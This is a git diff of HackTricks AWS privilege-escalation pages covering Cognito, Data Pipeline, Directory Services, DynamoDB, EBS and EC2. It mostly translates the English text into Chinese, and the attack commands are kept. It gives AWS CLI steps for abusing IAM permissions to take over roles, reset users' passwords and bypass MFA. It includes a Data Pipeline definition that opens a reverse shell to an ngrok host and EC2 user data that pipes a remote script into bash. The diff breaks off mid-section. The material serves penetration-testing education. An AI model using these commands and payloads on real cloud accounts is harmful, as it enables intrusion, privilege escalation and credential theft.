{{#endref}} -### Gathering credentials from Identity Pool +### 从身份池收集凭证 -As Cognito can grant **IAM role credentials** to both **authenticated** an **unauthenticated** **users**, if you locate the **Identity Pool ID** of an application (should be hardcoded on it) you can obtain new credentials and therefore privesc (inside an AWS account where you probably didn't even have any credential previously). +由于Cognito可以向**已认证**和**未认证**的**用户**授予**IAM角色凭证**,如果您找到应用程序的**身份池ID**(应该是硬编码在其中),您可以获得新的凭证,从而实现权限提升(在您可能之前没有任何凭证的AWS账户内)。 -For more information [**check this page**](../aws-unauthenticated-enum-access/#cognito). +有关更多信息,请[**查看此页面**](../aws-unauthenticated-enum-access/#cognito)。 -**Potential Impact:** Direct privesc to the services role attached to unauth users (and probably to the one attached to auth users). +**潜在影响:** 直接权限提升到附加给未认证用户的服务角色(可能也包括附加给已认证用户的角色)。 ### `cognito-identity:SetIdentityPoolRoles`, `iam:PassRole` -With this permission you can **grant any cognito role** to the authenticated/unauthenticated users of the cognito app. - +通过此权限,您可以**授予任何Cognito角色**给Cognito应用的已认证/未认证用户。 ```bash aws cognito-identity set-identity-pool-roles \ - --identity-pool-id \ - --roles unauthenticated= +--identity-pool-id \ +--roles unauthenticated= # Get credentials ## Get one ID @@ -33,286 +32,243 @@ aws cognito-identity get-id --identity-pool-id "eu-west-2:38b294756-2578-8246-90 ## Get creds for that id aws cognito-identity get-credentials-for-identity --identity-id "eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374" ``` +如果 Cognito 应用 **没有启用未认证用户**,您可能还需要权限 `cognito-identity:UpdateIdentityPool` 来启用它。 -If the cognito app **doesn't have unauthenticated users enabled** you might need also the permission `cognito-identity:UpdateIdentityPool` to enable it. - -**Potential Impact:** Direct privesc to any cognito role. +**潜在影响:** 直接的权限提升到任何 Cognito 角色。 ### `cognito-identity:update-identity-pool` -An attacker with this permission could set for example a Cognito User Pool under his control or any other identity provider where he can login as a **way to access this Cognito Identity Pool**. Then, just **login** on that user provider will **allow him to access the configured authenticated role in the Identity Pool**. - +拥有此权限的攻击者可以设置例如一个在他控制下的 Cognito 用户池或任何其他身份提供者,在那里他可以登录 **以访问此 Cognito 身份池**。然后,只需在该用户提供者上 **登录** 就会 **允许他访问身份池中配置的认证角色**。 ```bash # This example is using a Cognito User Pool as identity provider ## but you could use any other identity provider aws cognito-identity update-identity-pool \ - --identity-pool-id \ - --identity-pool-name \ - [--allow-unauthenticated-identities | --no-allow-unauthenticated-identities] \ - --cognito-identity-providers ProviderName=user-pool-id,ClientId=client-id,ServerSideTokenCheck=false +--identity-pool-id \ +--identity-pool-name \ +[--allow-unauthenticated-identities | --no-allow-unauthenticated-identities] \ +--cognito-identity-providers ProviderName=user-pool-id,ClientId=client-id,ServerSideTokenCheck=false # Now you need to login to the User Pool you have configured ## after having the id token of the login continue with the following commands: # In this step you should have already an ID Token aws cognito-identity get-id \ - --identity-pool-id \ - --logins cognito-idp..amazonaws.com/= +--identity-pool-id \ +--logins cognito-idp..amazonaws.com/= # Get the identity_id from thr previous commnad response aws cognito-identity get-credentials-for-identity \ - --identity-id \ - --logins cognito-idp..amazonaws.com/= +--identity-id \ +--logins cognito-idp..amazonaws.com/= ``` - -It's also possible to **abuse this permission to allow basic auth**: - +这也可以**滥用此权限以允许基本身份验证**: ```bash aws cognito-identity update-identity-pool \ - --identity-pool-id \ - --identity-pool-name \ - --allow-unauthenticated-identities - --allow-classic-flow +--identity-pool-id \ +--identity-pool-name \ +--allow-unauthenticated-identities +--allow-classic-flow ``` - -**Potential Impact**: Compromise the configured authenticated IAM role inside the identity pool. +**潜在影响**:破坏身份池中配置的经过身份验证的 IAM 角色。 ### `cognito-idp:AdminAddUserToGroup` -This permission allows to **add a Cognito user to a Cognito group**, therefore an attacker could abuse this permission to add an user under his control to other groups with **better** privileges or **different IAM roles**: - +此权限允许**将 Cognito 用户添加到 Cognito 组**,因此攻击者可以滥用此权限将其控制下的用户添加到具有**更好**权限或**不同 IAM 角色**的其他组中: ```bash aws cognito-idp admin-add-user-to-group \ - --user-pool-id \ - --username \ - --group-name +--user-pool-id \ +--username \ +--group-name ``` - -**Potential Impact:** Privesc to other Cognito groups and IAM roles attached to User Pool Groups. +**潜在影响:** 提升权限到其他Cognito组和附加到用户池组的IAM角色。 ### (`cognito-idp:CreateGroup` | `cognito-idp:UpdateGroup`), `iam:PassRole` -An attacker with these permissions could **create/update groups** with **every IAM role that can be used by a compromised Cognito Identity Provider** and make a compromised user part of the group, accessing all those roles: - +拥有这些权限的攻击者可以**创建/更新组**,并使用**被攻陷的Cognito身份提供者可以使用的每个IAM角色**,使被攻陷的用户成为该组的一部分,从而访问所有这些角色: ```bash aws cognito-idp create-group --group-name Hacked --user-pool-id --role-arn ``` - -**Potential Impact:** Privesc to other Cognito IAM roles. +**潜在影响:** 提升到其他Cognito IAM角色。 ### `cognito-idp:AdminConfirmSignUp` -This permission allows to **verify a signup**. By default anyone can sign in Cognito applications, if that is left, a user could create an account with any data and verify it with this permission. - +此权限允许**验证注册**。默认情况下,任何人都可以登录Cognito应用程序,如果不加以限制,用户可以使用任何数据创建帐户并通过此权限进行验证。 ```bash aws cognito-idp admin-confirm-sign-up \ - --user-pool-id \ - --username +--user-pool-id \ +--username ``` - -**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users if you can register a new user. Indirect privesc to other app functionalities being able to confirm any account. +**潜在影响:** 如果您可以注册新用户,则对经过身份验证的用户的身份池 IAM 角色进行间接权限提升。能够确认任何帐户会导致对其他应用功能的间接权限提升。 ### `cognito-idp:AdminCreateUser` -This permission would allow an attacker to create a new user inside the user pool. The new user is created as enabled, but will need to change its password. - +此权限将允许攻击者在用户池中创建新用户。新用户被创建为启用状态,但需要更改其密码。 ```bash aws cognito-idp admin-create-user \ - --user-pool-id \ - --username \ - [--user-attributes ] ([Name=email,Value=email@gmail.com]) - [--validation-data ] - [--temporary-password ] +--user-pool-id \ +--username \ +[--user-attributes ] ([Name=email,Value=email@gmail.com]) +[--validation-data ] +[--temporary-password ] ``` - -**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user +**潜在影响:** 直接提升到身份池 IAM 角色的认证用户。间接提升到其他应用功能,能够创建任何用户。 ### `cognito-idp:AdminEnableUser` -This permissions can help in. a very edge-case scenario where an attacker found the credentials of a disabled user and he needs to **enable it again**. - +此权限可以在非常边缘的情况下提供帮助,攻击者发现了一个禁用用户的凭证,并且他需要**再次启用它**。 ```bash aws cognito-idp admin-enable-user \ - --user-pool-id \ - --username +--user-pool-id \ +--username ``` - -**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users and permissions of the user if the attacker had credentials for a disabled user. +**潜在影响:** 间接提升到身份池 IAM 角色的权限,适用于经过身份验证的用户和用户的权限,如果攻击者拥有禁用用户的凭证。 ### `cognito-idp:AdminInitiateAuth`, **`cognito-idp:AdminRespondToAuthChallenge`** -This permission allows to login with the [**method ADMIN_USER_PASSWORD_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)**.** For more information follow the link. +此权限允许使用 [**方法 ADMIN_USER_PASSWORD_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)** 登录。** 有关更多信息,请访问链接。 ### `cognito-idp:AdminSetUserPassword` -This permission would allow an attacker to **change the password of any user**, making him able to impersonate any user (that doesn't have MFA enabled). - +此权限将允许攻击者 **更改任何用户的密码**,使其能够冒充任何用户(不启用 MFA 的用户)。 ```bash aws cognito-idp admin-set-user-password \ - --user-pool-id \ - --username \ - --password \ - --permanent +--user-pool-id \ +--username \ +--password \ +--permanent ``` - -**Potential Impact:** Direct privesc to potentially any user, so access to all the groups each user is member of and access to the Identity Pool authenticated IAM role. +**潜在影响:** 直接的权限提升,可能影响任何用户,因此可以访问每个用户所属于的所有组以及访问身份池认证的 IAM 角色。 ### `cognito-idp:AdminSetUserSettings` | `cognito-idp:SetUserMFAPreference` | `cognito-idp:SetUserPoolMfaConfig` | `cognito-idp:UpdateUserPool` -**AdminSetUserSettings**: An attacker could potentially abuse this permission to set a mobile phone under his control as **SMS MFA of a user**. - +**AdminSetUserSettings**:攻击者可能会滥用此权限,将其控制的手机设置为 **用户的 SMS MFA**。 ```bash aws cognito-idp admin-set-user-settings \ - --user-pool-id \ - --username \ - --mfa-options +--user-pool-id \ +--username \ +--mfa-options ``` - -**SetUserMFAPreference:** Similar to the previous one this permission can be used to set MFA preferences of a user to bypass the MFA protection. - +**SetUserMFAPreference:** 类似于前一个权限,此权限可用于设置用户的 MFA 偏好,以绕过 MFA 保护。 ```bash aws cognito-idp admin-set-user-mfa-preference \ - [--sms-mfa-settings ] \ - [--software-token-mfa-settings ] \ - --username \ - --user-pool-id +[--sms-mfa-settings ] \ +[--software-token-mfa-settings ] \ +--username \ +--user-pool-id ``` - -**SetUserPoolMfaConfig**: Similar to the previous one this permission can be used to set MFA preferences of a user pool to bypass the MFA protection. - +**SetUserPoolMfaConfig**: 类似于前一个权限,此权限可用于设置用户池的 MFA 首选项,以绕过 MFA 保护。 ```bash aws cognito-idp set-user-pool-mfa-config \ - --user-pool-id \ - [--sms-mfa-configuration ] \ - [--software-token-mfa-configuration ] \ - [--mfa-configuration ] +--user-pool-id \ +[--sms-mfa-configuration ] \ +[--software-token-mfa-configuration ] \ +[--mfa-configuration ] ``` +**UpdateUserPool:** 也可以更新用户池以更改 MFA 策略。 [在这里查看 cli](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html)。 -**UpdateUserPool:** It's also possible to update the user pool to change the MFA policy. [Check cli here](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html). - -**Potential Impact:** Indirect privesc to potentially any user the attacker knows the credentials of, this could allow to bypass the MFA protection. +**Potential Impact:** 间接的权限提升,可能针对攻击者知道凭据的任何用户,这可能允许绕过 MFA 保护。 ### `cognito-idp:AdminUpdateUserAttributes` -An attacker with this permission could change the email or phone number or any other attribute of a user under his control to try to obtain more privileges in an underlaying application.\ -This allows to change an email or phone number and set it as verified. - +拥有此权限的攻击者可以更改其控制下用户的电子邮件或电话号码或任何其他属性,以尝试在基础应用程序中获得更多权限。\ +这允许更改电子邮件或电话号码并将其设置为已验证。 ```bash aws cognito-idp admin-update-user-attributes \ - --user-pool-id \ - --username \ - --user-attributes +--user-pool-id \ +--username \ +--user-attributes ``` - -**Potential Impact:** Potential indirect privesc in the underlying application using Cognito User Pool that gives privileges based on user attributes. +**潜在影响:** 在使用 Cognito 用户池的基础应用程序中,可能会间接提升权限,基于用户属性授予权限。 ### `cognito-idp:CreateUserPoolClient` | `cognito-idp:UpdateUserPoolClient` -An attacker with this permission could **create a new User Pool Client less restricted** than already existing pool clients. For example, the new client could allow any kind of method to authenticate, don't have any secret, have token revocation disabled, allow tokens to be valid for a longer period... +拥有此权限的攻击者可以**创建一个新的用户池客户端,其限制低于**现有的池客户端。例如,新的客户端可以允许任何类型的方法进行身份验证,没有任何秘密,禁用令牌撤销,允许令牌有效期更长... -The same can be be don if instead of creating a new client, an **existing one is modified**. - -In the [**command line**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/create-user-pool-client.html) (or the [**update one**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool-client.html)) you can see all the options, check it!. +如果不是创建一个新客户端,而是**修改现有客户端**,也可以做到这一点。 +在 [**命令行**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/create-user-pool-client.html)(或 [**更新命令**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool-client.html))中,您可以查看所有选项,检查一下! ```bash aws cognito-idp create-user-pool-client \ - --user-pool-id \ - --client-name \ - [...] +--user-pool-id \ +--client-name \ +[...] ``` - -**Potential Impact:** Potential indirect privesc to the Identity Pool authorized user used by the User Pool by creating a new client that relax the security measures and makes possible to an attacker to login with a user he was able to create. +**潜在影响:** 通过创建一个放宽安全措施的新客户端,可能间接导致对用户池使用的身份池授权用户的权限提升,使攻击者能够使用他能够创建的用户登录。 ### `cognito-idp:CreateUserImportJob` | `cognito-idp:StartUserImportJob` -An attacker could abuse this permission to create users y uploading a csv with new users. - +攻击者可以利用此权限通过上传包含新用户的csv文件来创建用户。 ```bash # Create a new import job aws cognito-idp create-user-import-job \ - --job-name \ - --user-pool-id \ - --cloud-watch-logs-role-arn +--job-name \ +--user-pool-id \ +--cloud-watch-logs-role-arn # Use a new import job aws cognito-idp start-user-import-job \ - --user-pool-id \ - --job-id +--user-pool-id \ +--job-id # Both options before will give you a URL where you can send the CVS file with the users to create curl -v -T "PATH_TO_CSV_FILE" \ - -H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL" +-H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL" ``` +(在创建新导入作业的情况下,您可能还需要 iam passrole 权限,我还没有测试过)。 -(In the case where you create a new import job you might also need the iam passrole permission, I haven't tested it yet). - -**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user. +**潜在影响:** 直接提升到经过身份验证的用户的身份池 IAM 角色。间接提升到其他应用功能,能够创建任何用户。 ### `cognito-idp:CreateIdentityProvider` | `cognito-idp:UpdateIdentityProvider` -An attacker could create a new identity provider to then be able to **login through this provider**. - +攻击者可以创建一个新的身份提供者,从而能够通过该提供者**登录**。 ```bash aws cognito-idp create-identity-provider \ - --user-pool-id \ - --provider-name \ - --provider-type \ - --provider-details \ - [--attribute-mapping ] \ - [--idp-identifiers ] +--user-pool-id \ +--provider-name \ +--provider-type \ +--provider-details \ +[--attribute-mapping ] \ +[--idp-identifiers ] ``` +**潜在影响:** 直接提升到经过身份验证的用户的身份池 IAM 角色。间接提升到其他应用功能,能够创建任何用户。 -**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user. +### cognito-sync:\* 分析 -### cognito-sync:\* Analysis +这是 Cognito 身份池角色中默认的非常常见的权限。即使权限中的通配符看起来总是不好(特别是来自 AWS),**给定的权限从攻击者的角度来看并不是特别有用**。 -This is a very common permission by default in roles of Cognito Identity Pools. Even if a wildcard in a permissions always looks bad (specially coming from AWS), the **given permissions aren't super useful from an attackers perspective**. +此权限允许读取身份池和身份池内身份 ID 的使用信息(这不是敏感信息)。\ +身份 ID 可能有 [**数据集**](https://docs.aws.amazon.com/cognitosync/latest/APIReference/API_Dataset.html) 分配给它们,这些是会话的信息(AWS 将其定义为 **保存的游戏**)。这可能包含某种敏感信息(但概率相当低)。您可以在 [**枚举页面**](../aws-services/aws-cognito-enum/) 找到如何访问这些信息。 -This permission allows to read use information of Identity Pools and Identity IDs inside Identity Pools (which isn't sensitive info).\ -Identity IDs might have [**Datasets**](https://docs.aws.amazon.com/cognitosync/latest/APIReference/API_Dataset.html) assigned to them, which are information of the sessions (AWS define it like a **saved game**). It might be possible that this contain some kind of sensitive information (but the probability is pretty low). You can find in the [**enumeration page**](../aws-services/aws-cognito-enum/) how to access this information. +攻击者还可以使用这些权限来 **注册自己到一个 Cognito 流,以发布这些数据集上的更改** 或 **在 Cognito 事件上触发的 Lambda**。我没有看到过这种用法,我也不期望这里有敏感信息,但这并不是不可能的。 -An attacker could also use these permissions to **enroll himself to a Cognito stream that publish changes** on these datases or a **lambda that triggers on cognito events**. I haven't seen this being used, and I wouldn't expect sensitive information here, but it isn't impossible. +### 自动化工具 -### Automatic Tools +- [Pacu](https://github.com/RhinoSecurityLabs/pacu),AWS 利用框架,现在包括 "cognito\_\_enum" 和 "cognito\_\_attack" 模块,这些模块自动枚举账户中的所有 Cognito 资产并标记弱配置、用于访问控制的用户属性等,同时还自动创建用户(包括 MFA 支持)和基于可修改自定义属性、可用身份池凭证、可假设角色的 ID 令牌等的权限提升。 -- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. +有关模块功能的描述,请参见 [博客文章](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2) 的第 2 部分。有关安装说明,请参见主 [Pacu](https://github.com/RhinoSecurityLabs/pacu) 页面。 -For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. - -#### Usage - -Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: +#### 用法 +示例 cognito\_\_attack 用法,尝试用户创建和针对给定身份池和用户池客户端的所有权限提升向量: ```bash Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` - -Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account: - +示例 cognito\_\_enum 用法,以收集当前 AWS 账户中可见的所有用户池、用户池客户端、身份池、用户等: ```bash Pacu (new:test) > run cognito__enum ``` +- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) 是一个用 Python 编写的 CLI 工具,实施对 Cognito 的不同攻击,包括权限提升。 -- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including a privesc escalation. - -#### Installation - +#### 安装 ```bash $ pip install cognito-scanner ``` - -#### Usage - +#### 用法 ```bash $ cognito-scanner --help ``` - -For more information check [https://github.com/padok-team/cognito-scanner](https://github.com/padok-team/cognito-scanner) +有关更多信息,请查看 [https://github.com/padok-team/cognito-scanner](https://github.com/padok-team/cognito-scanner) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md index 82c82682e..61789404d 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md @@ -4,7 +4,7 @@ ## datapipeline -For more info about datapipeline check: +有关datapipeline的更多信息,请查看: {{#ref}} ../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md @@ -12,67 +12,57 @@ For more info about datapipeline check: ### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline` -Users with these **permissions can escalate privileges by creating a Data Pipeline** to execute arbitrary commands using the **permissions of the assigned role:** - +具有这些**权限的用户可以通过创建数据管道来提升权限**,以使用**分配角色的权限执行任意命令:** ```bash aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string ``` - -After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations: - +在管道创建后,攻击者更新其定义以指示特定的操作或资源创建: ```json { - "objects": [ - { - "id": "CreateDirectory", - "type": "ShellCommandActivity", - "command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'", - "runsOn": { "ref": "instance" } - }, - { - "id": "Default", - "scheduleType": "ondemand", - "failureAndRerunMode": "CASCADE", - "name": "Default", - "role": "assumable_datapipeline", - "resourceRole": "assumable_datapipeline" - }, - { - "id": "instance", - "name": "instance", - "type": "Ec2Resource", - "actionOnTaskFailure": "terminate", - "actionOnResourceFailure": "retryAll", - "maximumRetries": "1", - "instanceType": "t2.micro", - "securityGroups": ["default"], - "role": "assumable_datapipeline", - "resourceRole": "assumable_ec2_profile_instance" - } - ] +"objects": [ +{ +"id": "CreateDirectory", +"type": "ShellCommandActivity", +"command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'", +"runsOn": { "ref": "instance" } +}, +{ +"id": "Default", +"scheduleType": "ondemand", +"failureAndRerunMode": "CASCADE", +"name": "Default", +"role": "assumable_datapipeline", +"resourceRole": "assumable_datapipeline" +}, +{ +"id": "instance", +"name": "instance", +"type": "Ec2Resource", +"actionOnTaskFailure": "terminate", +"actionOnResourceFailure": "retryAll", +"maximumRetries": "1", +"instanceType": "t2.micro", +"securityGroups": ["default"], +"role": "assumable_datapipeline", +"resourceRole": "assumable_ec2_profile_instance" +} +] } ``` - > [!NOTE] -> Note that the **role** in **line 14, 15 and 27** needs to be a role **assumable by datapipeline.amazonaws.com** and the role in **line 28** needs to be a **role assumable by ec2.amazonaws.com with a EC2 profile instance**. +> 请注意,**第14、15和27行**中的**角色**需要是**可由datapipeline.amazonaws.com假设的角色**,而**第28行**中的角色需要是**可由ec2.amazonaws.com假设的角色,并且具有EC2配置文件实例**。 > -> Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one). - +> 此外,EC2实例将仅能访问可由EC2实例假设的角色(因此您只能窃取那个角色)。 ```bash aws datapipeline put-pipeline-definition --pipeline-id \ - --pipeline-definition file:///pipeline/definition.json +--pipeline-definition file:///pipeline/definition.json ``` +**攻击者制作的** pipeline definition file **包含执行命令或通过 AWS API 创建资源的指令,利用 Data Pipeline 的角色权限来潜在地获得额外的权限。** -The **pipeline definition file, crafted by the attacker, includes directives to execute commands** or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges. - -**Potential Impact:** Direct privesc to the ec2 service role specified. +**潜在影响:** 直接提升到指定的 ec2 服务角色。 ## References - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md index ce24095ed..7e03bf49e 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md @@ -1,10 +1,10 @@ -# AWS - Directory Services Privesc +# AWS - 目录服务权限提升 {{#include ../../../banners/hacktricks-training.md}} -## Directory Services +## 目录服务 -For more info about directory services check: +有关目录服务的更多信息,请查看: {{#ref}} ../aws-services/aws-directory-services-workdocs-enum.md @@ -12,27 +12,21 @@ For more info about directory services check: ### `ds:ResetUserPassword` -This permission allows to **change** the **password** of any **existent** user in the Active Directory.\ -By default, the only existent user is **Admin**. - +此权限允许**更改**Active Directory中任何**现有**用户的**密码**。\ +默认情况下,唯一的现有用户是**Admin**。 ``` aws ds reset-user-password --directory-id --user-name Admin --new-password Newpassword123. ``` - ### AWS Management Console -It's possible to enable an **application access URL** that users from AD can access to login: +可以启用一个 **应用访问 URL**,让 AD 用户可以登录:
-And then **grant them an AWS IAM role** for when they login, this way an AD user/group will have access over AWS management console: +然后 **授予他们一个 AWS IAM 角色**,以便他们登录,这样 AD 用户/组将能够访问 AWS 管理控制台:
-There isn't apparently any way to enable the application access URL, the AWS Management Console and grant permission +显然没有任何方法可以启用应用访问 URL、AWS 管理控制台并授予权限 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md index b4af46712..7648f9be5 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md @@ -4,7 +4,7 @@ ## dynamodb -For more info about dynamodb check: +有关dynamodb的更多信息,请查看: {{#ref}} ../aws-services/aws-dynamodb-enum.md @@ -12,7 +12,7 @@ For more info about dynamodb check: ### Post Exploitation -As far as I know there is **no direct way to escalate privileges in AWS just by having some AWS `dynamodb` permissions**. You can **read sensitive** information from the tables (which could contain AWS credentials) and **write information on the tables** (which could trigger other vulnerabilities, like lambda code injections...) but all these options are already considered in the **DynamoDB Post Exploitation page**: +据我所知,**仅凭一些AWS `dynamodb` 权限没有直接的方法来提升权限**。您可以**从表中读取敏感**信息(可能包含AWS凭证)并**在表中写入信息**(这可能触发其他漏洞,例如lambda代码注入...),但所有这些选项在**DynamoDB Post Exploitation页面**中已经考虑过: {{#ref}} ../aws-post-exploitation/aws-dynamodb-post-exploitation.md @@ -21,7 +21,3 @@ As far as I know there is **no direct way to escalate privileges in AWS just by ### TODO: Read data abusing data Streams {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md index 36ea3bc53..b13111638 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md @@ -6,26 +6,22 @@ ### `ebs:ListSnapshotBlocks`, `ebs:GetSnapshotBlock`, `ec2:DescribeSnapshots` -An attacker with those will be able to potentially **download and analyze volumes snapshots locally** and search for sensitive information in them (like secrets or source code). Find how to do this in: +拥有这些权限的攻击者将能够**在本地下载和分析卷快照**,并在其中搜索敏感信息(如秘密或源代码)。了解如何做到这一点: {{#ref}} ../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md {{#endref}} -Other permissions might be also useful such as: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags` +其他权限也可能有用,例如:`ec2:DescribeInstances`,`ec2:DescribeVolumes`,`ec2:DeleteSnapshot`,`ec2:CreateSnapshot`,`ec2:CreateTags` -The tool [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) performs this attack to e**xtract passwords from a domain controller**. +工具 [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) 执行此攻击以**从域控制器提取密码**。 -**Potential Impact:** Indirect privesc by locating sensitive information in the snapshot (you could even get Active Directory passwords). +**潜在影响:** 通过在快照中定位敏感信息进行间接权限提升(您甚至可以获取Active Directory密码)。 ### **`ec2:CreateSnapshot`** -Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project. +任何拥有**`EC2:CreateSnapshot`**权限的AWS用户都可以通过创建**域控制器的快照**来窃取所有域用户的哈希值,将其挂载到他们控制的实例上,并**导出NTDS.dit和SYSTEM**注册表蜂巢文件,以便与Impacket的secretsdump项目一起使用。 -You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot. +您可以使用此工具来自动化攻击:[https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy),或者在创建快照后使用之前的技术之一。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md index ad31bde00..965e075df 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md @@ -4,7 +4,7 @@ ## EC2 -For more **info about EC2** check: +有关 **EC2 的更多信息**,请查看: {{#ref}} ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ @@ -12,51 +12,46 @@ For more **info about EC2** check: ### `iam:PassRole`, `ec2:RunInstances` -An attacker could **create and instance attaching an IAM role and then access the instance** to steal the IAM role credentials from the metadata endpoint. +攻击者可以 **创建一个实例并附加 IAM 角色,然后访问该实例** 以从元数据端点窃取 IAM 角色凭证。 -- **Access via SSH** - -Run a new instance using a **created** **ssh key** (`--key-name`) and then ssh into it (if you want to create a new one you might need to have the permission `ec2:CreateKeyPair`). +- **通过 SSH 访问** +使用 **创建的** **ssh 密钥** (`--key-name`) 运行一个新实例,然后 ssh 进入它(如果您想创建一个新的,您可能需要拥有权限 `ec2:CreateKeyPair`)。 ```bash aws ec2 run-instances --image-id --instance-type t2.micro \ - --iam-instance-profile Name= --key-name \ - --security-group-ids +--iam-instance-profile Name= --key-name \ +--security-group-ids ``` +- **通过用户数据访问 rev shell** -- **Access via rev shell in user data** - -You can run a new instance using a **user data** (`--user-data`) that will send you a **rev shell**. You don't need to specify security group this way. - +您可以使用 **用户数据** (`--user-data`) 启动一个新实例,该实例将向您发送一个 **rev shell**。您不需要以这种方式指定安全组。 ```bash echo '#!/bin/bash curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh aws ec2 run-instances --image-id --instance-type t2.micro \ - --iam-instance-profile Name=E \ - --count 1 \ - --user-data "file:///tmp/rev.sh" +--iam-instance-profile Name=E \ +--count 1 \ +--user-data "file:///tmp/rev.sh" ``` - -Be careful with GuradDuty if you use the credentials of the IAM role outside of the instance: +注意,如果您在实例外部使用 IAM 角色的凭据,请小心 GuradDuty: {{#ref}} ../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md {{#endref}} -**Potential Impact:** Direct privesc to a any EC2 role attached to existing instance profiles. +**潜在影响:** 直接提升权限到任何附加到现有实例配置文件的 EC2 角色。 -#### Privesc to ECS - -With this set of 